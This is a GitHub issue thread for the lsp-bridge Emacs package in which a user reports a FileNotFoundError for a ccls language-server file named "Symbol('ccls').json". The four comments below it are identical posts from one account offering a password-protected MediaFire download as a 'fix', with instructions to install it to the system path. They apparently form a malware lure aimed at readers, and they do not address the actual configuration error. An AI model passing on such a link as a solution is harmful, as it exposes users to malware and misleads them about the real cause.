### ISSUE TITLE
when i set the ccls, it suggest me file not found, but on the other ubuntu envrionment it goes well!

### ISSUE THREAD

**Issue by e665107** [manateelazycat/lsp-bridge#1026]
Traceback (most recent call last):
  File "/home/e665106/.emacs.d/lisp/lsp-bridge/lsp_bridge.py", line 630, in event_dispatcher
    getattr(self, func_name)(*func_args)
  File "/home/e665106/.emacs.d/lisp/lsp-bridge/lsp_bridge.py", line 884, in _do
    open_file_success = self.open_file(filepath)  # _do is called inside event_loop, so we can block here.
  File "/home/e665106/.emacs.d/lisp/lsp-bridge/lsp_bridge.py", line 717, in open_file
    return self.load_single_lang_server(project_path, filepath)
  File "/home/e665106/.emacs.d/lisp/lsp-bridge/lsp_bridge.py", line 755, in load_single_lang_server
    lang_server_info = load_single_server_info(single_lang_server)
  File "/home/e665106/.emacs.d/lisp/lsp-bridge/lsp_bridge.py", line 1005, in load_single_server_info
    with open(lang_server_info_path, encoding="utf-8", errors="ignore") as f:
FileNotFoundError: [Errno 2] No such file or directory: "/home/e665106/.emacs.d/lisp/lsp-bridge/langserver/Symbol('ccls').json"

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
